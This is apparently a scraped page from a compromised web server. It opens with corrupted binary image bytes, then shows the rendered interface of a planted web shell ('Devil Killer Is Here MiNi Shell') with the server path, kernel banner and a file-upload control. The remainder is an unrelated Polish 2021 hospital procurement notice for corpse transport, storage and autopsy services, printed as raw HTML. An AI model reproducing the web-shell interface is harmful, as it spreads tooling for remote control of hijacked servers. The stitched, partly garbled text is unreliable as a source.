JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211231/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211231/0034020401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie odbioru, transportu zwłok do chłodni i ich przechowania, umycia, ubrania oraz przeprowadzanie sekcji zwłok lub oględzin (powtórzony). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zespół Opieki Zdrowotnej w Świdnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000311674</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leśna 27-29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">74 8517 400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">74 8517 437</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@szpital.swidnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.swidnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie odbioru, transportu zwłok do chłodni i ich przechowania, umycia, ubrania oraz przeprowadzanie sekcji zwłok lub oględzin (powtórzony). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4c103af2-6a07-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00340204</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003885/17/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Odbiór, transport oraz przechowywanie zwłok.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpital-swidnica.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej pod adresem<br/>https://szpital-swidnica.logintrade.net/rejestracja/ustawowe.html<br/>2. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z<br/>uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji<br/>elektronicznej (art. 61 pzp). Przez środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>(Dz. U. z 2019 r. poz. 123 i 730).<br/>3.28. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>a) drogą elektroniczną: zamowienia@szpital.swidnica.pl<br/>b) poprzez Platformę, dostępną pod adresem:<br/>https://szpital-swidnica.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia o wartości mniejszej niż progi unijne ofertę, oświadczenie, o<br/>którym mowa w art. w art. 125 ust.1, składa się, pod rygorem nieważności, w formie elektronicznej lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (art. 63 ust.2 pzp).<br/>2. Postępowania zakupowe prowadzone są przy użyciu środków komunikacji elektronicznej.<br/>Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy Przetargowej<br/>SP ZOZ w Świdnicy https://szpital-swidnica.logintrade.net/ lub mailem. Do połączenia używany jest<br/>szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto<br/>na Platformie Przetargowej SP ZOZ w Świdnicy: ma dostęp do możliwości złożenia, zmiany, wycofania<br/>oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z<br/>Zamawiającym w pozostałych obszarach. Zamawiający dopuszcza komunikację z wykonawcami na<br/>adres mailowy podany w SWZ (z zastrzeżeniem, że oferta wraz z załącznikami złożona musi być na platformie).<br/>3. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej SP<br/>ZOZ w Świdnicy:<br/>a) Dopuszczalne przeglądarki internetowe: Internet Explorer 10 i nowsze, Edge, Google Chrome,<br/>Mozilla Firefox, Opera<br/>b) Pozostałe wymagania techniczne: dostęp do sieci Internet, obsługa przez przeglądarkę protokołu<br/>XMLHttpRequest – ajax, włączona obsługa JavaScript, zalecana szybkość łącza internetowego<br/>powyżej 500 KB/s, zainstalowany Acrobat Reader, zainstalowane środowisko uruchomieniowe Java -<br/>Java SE Runtime Environment 6 Update 24 lub nowszy<br/>c) W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe: dla<br/>Windows Vista: Internet Explorer 8, Internet Explorer 9, dla Windows 7: Internet Explorer 9, Internet<br/>Explorer 11, dla Windows 8: Internet Explorer 11, dla Windows 10: Internet Explorer 11<br/>d) Wspierane są rozwiązania dostarczane przez firmy: Polskie Centrum Certyfikacji Elektronicznej<br/>Sigillum Polskiej Wytwórni Papierów Wartościowych S.A., Centrum Obsługi Podpisu Elektronicznego<br/>Szafir Krajowej Izby Rozliczeniowej S.A., Powszechne Centrum Certyfikacji Certum firmy Asseco Data<br/>Systems S.A., Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A<br/>e) Instrukcja złożenia oferty środkiem komunikacji elektronicznej w niniejszym postępowaniu dostępna<br/>jest na stronie https://szpital-swidnica.logintrade.net/rejestracja/ustawowe.html w zakładce<br/>INSTRUKCJE plik Udział w trybie podstawowym bez negocjacji.<br/>4. Środkiem komunikacji elektronicznej, służącym złożeniu oferty przez Wykonawcę, jest jego<br/>prawidłowe złożenie na Platformie dostępnej pod adresem https://szpitalswidnica.<br/>logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy<br/>zgodnym z niniejszym postępowaniem. Korzystanie z Platformy Przetargowej przez Wykonawcę jest<br/>bezpłatne. 5.Po stworzeniu lub wygenerowaniu przez Wykonawcę dokumentu elektronicznego Wykonawca<br/>podpisuje ten dokument kwalifikowanym podpisem elektronicznym, wystawionym przez dostawcę<br/>kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne – podpis<br/>elektroniczny, spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o<br/>usługach zaufania oraz identyfikacji elektronicznej (Dz.U. z 2020 r. poz. 1173 t.j.) lub podpisem<br/>zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">I. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektyw3y 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016 r., str. 1), dalej RODO, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Samodzielny Publiczny Zespół Opieki<br/>Zdrowotnej w Świdnicy, zwany dalej: „Administratorem”. Możesz skontaktować się z Administratorem<br/>pisząc na adres: Samodzielny Publiczny Zespół Opieki Zdrowotnej w Świdnicy, 58-100 Świdnica, ul.<br/>Leśna 27-29 lub telefonując pod numer: 74 8517400 / Możesz również skontaktować się z<br/>Administratorem za pośrednictwem powołanego przez niego inspektora ochrony danych pisząc na<br/>adres: Samodzielny Publiczny Zespół Opieki Zdrowotnej<br/>w Świdnicy, 58-100 Świdnica, ul. Leśna 27-29 lub adres email: iod@szpital.swidnica.pl<br/>2. Pani/Pana dane przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego.<br/>3. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 19 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. –Prawo zamówień publicznych (t.j. Dz. U. poz. 2019 r. z późń.zm.), dalej „ustawa Pzp”.<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, oraz zgodnie z<br/>jednolitym rzeczowym wykazem akt obowiązującym w Samodzielnym Publicznym Zespole Opieki<br/>Zdrowotnej w Świdnicy.<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>6. Posiada Pani/Pan:<br/>􀀀 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>􀀀 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych٭,<br/>􀀀 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art.. 18 ust. 2 RODO٭٭,<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>Nie przysługuje Pani/Panu:<br/>􀀀 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>􀀀 prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>􀀀 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8. W oparciu o Pani/Pana dane osobowe Administrator nie będzie podejmował zautomatyzowanych<br/>decyzji w tym decyzji będących wynikiem profilowania٭٭٭.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Skorzystanie przez osobę, której dane osobowe dotyczą,<br/>z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EA/37/TPBN/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług w zakresie odbioru, transportu zwłok do<br/>chłodni i ich przechowania, umycia, ubrania oraz przeprowadzanie sekcji zwłok lub oględzin<br/>(szczegółowo opisany w SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85110000-3 - Usługi szpitalne i podobne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które nie zostaną<br/>odrzucone przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale 7 i 8 SWZ oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże,<br/>że posiada dokument potwierdzający posiadanie pomieszczeń prosektorium usytuowanych na<br/>terenie miasta Świdnicy oraz aktualne zaświadczenie<br/>Stacji Sanitarno-Epidemiologicznej, że prosektorium podlega stałemu nadzorowi na zasadach<br/>określonych w ustawie o Inspekcji sanitarnej oraz spełnia wymogi pozwalające na prowadzenie<br/>działalności zgodnie z przedmiotem zamówienia.<br/>Jeżeli informacje, wymagane z państwowej inspekcji sanitarnej wynikają z protokołu kontroli<br/>albo innego dokumentu wystawionego przez Inspekcję Sanitarną, zamiast zaświadczenia<br/>Wykonawca może załączyć protokół kontroli albo inny dokument, jeżeli stwierdza on aktualny<br/>stan faktyczny.<br/>2.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną nie mniejszą niż 200 000,00 zł.<br/>2.4. zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej jedną<br/>usługę będącą przedmiotem niniejszego zamówienia o wartości nie mniejszej niż 150 000,00 zł<br/>brutto – wg Załącznika nr 5 do SWZ,<br/>b) oświadczenie o posiadaniu niezbędnych do wykonania zamówienia narzędzi i urządzeń – wg<br/>Załącznika nr 4 do SWZ:<br/>- co najmniej jeden samochód przeznaczony do przewozu zwłok i szczątków ludzkich,<br/>spełniającym wymagania techniczne i sanitarne, określone w art. 4 Rozporządzenia Ministra<br/>Zdrowia z dnia 27 grudnia 2007r. w sprawie wydawania pozwoleń i zaświadczeń na przewóz<br/>zwłok i szczątków ludzkich (Dz. U. 2007, Nr 249 poz. 1866);<br/>- wózek do transportu zwłok (tzw. kapsuła);<br/>- stół sekcyjny z zestawem podstawowych narzędzi sekcyjnych,<br/>- dysponuje własną chłodnią do przechowywania minimum dwunastu (12) zwłok w obiekcie.<br/>4. Zamawiający będzie oceniał warunki udziału w postępowaniu w systemie spełnia/nie spełnia,<br/>w oparciu o informacje zawarte w przedłożonych oświadczeniach i dokumentach (wymaganych<br/>przez Zamawiającego i podanych w SWZ i ogłoszeniu). Z ich treści musi wynikać jednoznacznie,<br/>iż w/w warunki Wykonawca spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane<br/>umożliwiające dostęp do tych środków (art. 274 ust.4 Pzp).<br/>4. Podmiot zagraniczny.<br/>4.1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast:<br/>1) odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o których mowa w § 2 ust. 1 pkt 6 rozporządzenia z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (odpowiednio pkt. 4.1 ppkt.1) - składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie<br/>jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury<br/>przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>4.2. Dokument, o którym mowa w pkt 4.1 ppkt 1, powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed ich złożeniem.<br/>4.3. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentu, o których mowa w pkt 4.1 ppkt 1, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis pkt. 4.2 stosuje się.</span> </h3> <h3 class="mb-0"> 